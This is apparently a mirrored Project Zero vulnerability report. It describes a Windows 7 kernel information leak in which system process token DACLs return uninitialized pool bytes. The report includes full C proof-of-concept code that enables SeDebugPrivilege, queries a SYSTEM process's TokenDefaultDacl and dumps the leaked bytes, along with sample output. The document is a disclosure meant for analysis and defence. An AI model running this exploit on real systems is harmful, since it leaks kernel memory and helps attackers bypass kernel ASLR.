扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 |
/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1145 We have observed (on Windows 7 32-bit) that for unclear reasons, the kernel-mode structure containing the default DACL of system processes' tokens (lsass.exe, services.exe, ...) has 8 uninitialized bytes at the end, as the size of the structure (ACL.AclSize) is larger than the sum of ACE lengths (ACE_HEADER.AceSize). It is possible to read the leftover pool data using a GetTokenInformation(TokenDefaultDacl) call. When the attached proof-of-concept code is run against a SYSTEM process (pid of the process must be passed in the program argument), on a system with Special Pools enabled for ntoskrnl.exe, output similar to the following can be observed: >NtQueryInformationToken.exe 520 00000000: 54 bf 2b 00 02 00 3c 00 02 00 00 00 00 00 14 00 T.+...<......... 00000010: 00 00 00 10 01 01 00 00 00 00 00 05 12 00 00 00 ................ 00000020: 00 00 18 00 00 00 02 a0 01 02 00 00 00 00 00 05 ................ 00000030: 20 00 00 00 20 02 00 00[01 01 01 01 01 01 01 01] ... ........... The last eight 0x01 bytes are markers inserted by Special Pools, which visibly haven't been overwritten by any actual data prior to being returned to user-mode. While reading DACLs of system processes may require special privileges (such as the ability to acquire SeDebugPrivilege), the root cause of the behavior could potentially make it possible to also create uninitialized DACLs that are easily accessible by regular users. This could in turn lead to a typical kernel memory disclosure condition, which would allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space. Since it's not clear to us what causes the abberant behavior, we're reporting it for further analysis to be on the safe side. The proof-of-concept code is mostly based on the example at https://support.microsoft.com/en-us/help/131065/how-to-obtain-a-handle-to-any-process-with-sedebugprivilege. */ #define RTN_OK 0 #define RTN_USAGE 1 #define RTN_ERROR 13 #include <windows.h> #include <stdio.h> BOOL SetPrivilege( HANDLE hToken,// token handle LPCTSTR Privilege,// Privilege to enable/disable BOOL bEnablePrivilege // TRUE to enable.FALSE to disable ); void DisplayError(LPTSTR szAPI); VOID PrintHex(PBYTE Data, ULONG dwBytes); int main(int argc, char *argv[]) { HANDLE hProcess; HANDLE hToken; int dwRetVal = RTN_OK; // assume success from main() // show correct usage for kill if (argc != 2) { fprintf(stderr, "Usage: %s [ProcessId]\n", argv[0]); return RTN_USAGE; } if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken)) { if (GetLastError() == ERROR_NO_TOKEN) { if (!ImpersonateSelf(SecurityImpersonation)) return RTN_ERROR; if (!OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, FALSE, &hToken)){ DisplayError(L"OpenThreadToken"); return RTN_ERROR; } } else return RTN_ERROR; } // enable SeDebugPrivilege if (!SetPrivilege(hToken, SE_DEBUG_NAME, TRUE)) { DisplayError(L"SetPrivilege"); // close token handle CloseHandle(hToken); // indicate failure return RTN_ERROR; } CloseHandle(hToken); // open the process if ((hProcess = OpenProcess( PROCESS_QUERY_INFORMATION, FALSE, atoi(argv[1]) // PID from commandline )) == NULL) { DisplayError(L"OpenProcess"); return RTN_ERROR; } // Open process token. if (!OpenProcessToken(hProcess, TOKEN_READ, &hToken)) { DisplayError(L"OpenProcessToken"); return RTN_ERROR; } DWORD ReturnLength = 0; if (!GetTokenInformation(hToken, TokenDefaultDacl, NULL, 0, &ReturnLength) && GetLastError() != ERROR_INSUFFICIENT_BUFFER) { DisplayError(L"GetTokenInformation #1"); return RTN_ERROR; } PBYTE OutputBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, ReturnLength); if (!GetTokenInformation(hToken, TokenDefaultDacl, OutputBuffer, ReturnLength, &ReturnLength)) { DisplayError(L"GetTokenInformation #2"); return RTN_ERROR; } PrintHex(OutputBuffer, ReturnLength); // close handles HeapFree(GetProcessHeap(), 0, OutputBuffer); CloseHandle(hProcess); return dwRetVal; } BOOL SetPrivilege( HANDLE hToken,// token handle LPCTSTR Privilege,// Privilege to enable/disable BOOL bEnablePrivilege // TRUE to enable.FALSE to disable ) { TOKEN_PRIVILEGES tp; LUID luid; TOKEN_PRIVILEGES tpPrevious; DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES); if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE; // // first pass.get current privilege setting // tp.PrivilegeCount = 1; tp.Privileges[0].Luid = luid; tp.Privileges[0].Attributes = 0; AdjustTokenPrivileges( hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), &tpPrevious, &cbPrevious ); if (GetLastError() != ERROR_SUCCESS) return FALSE; // // second pass.set privilege based on previous setting // tpPrevious.PrivilegeCount = 1; tpPrevious.Privileges[0].Luid = luid; if (bEnablePrivilege) { tpPrevious.Privileges[0].Attributes |= (SE_PRIVILEGE_ENABLED); } else { tpPrevious.Privileges[0].Attributes ^= (SE_PRIVILEGE_ENABLED & tpPrevious.Privileges[0].Attributes); } AdjustTokenPrivileges( hToken, FALSE, &tpPrevious, cbPrevious, NULL, NULL ); if (GetLastError() != ERROR_SUCCESS) return FALSE; return TRUE; } void DisplayError( LPTSTR szAPI// pointer to failed API name ) { LPTSTR MessageBuffer; DWORD dwBufferLength; fwprintf(stderr, L"%s() error!\n", szAPI); if (dwBufferLength = FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), GetSystemDefaultLangID(), (LPTSTR)&MessageBuffer, 0, NULL )) { DWORD dwBytesWritten; // // Output message string on stderr // WriteFile( GetStdHandle(STD_ERROR_HANDLE), MessageBuffer, dwBufferLength, &dwBytesWritten, NULL ); // // free the buffer allocated by the system // LocalFree(MessageBuffer); } } VOID PrintHex(PBYTE Data, ULONG dwBytes) { for (ULONG i = 0; i < dwBytes; i += 16) { printf("%.8x: ", i); for (ULONG j = 0; j < 16; j++) { if (i + j < dwBytes) { printf("%.2x ", Data[i + j]); } else { printf("?? "); } } for (ULONG j = 0; j < 16; j++) { if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) { printf("%c", Data[i + j]); } else { printf("."); } } printf("\n"); } } |
体验盒子
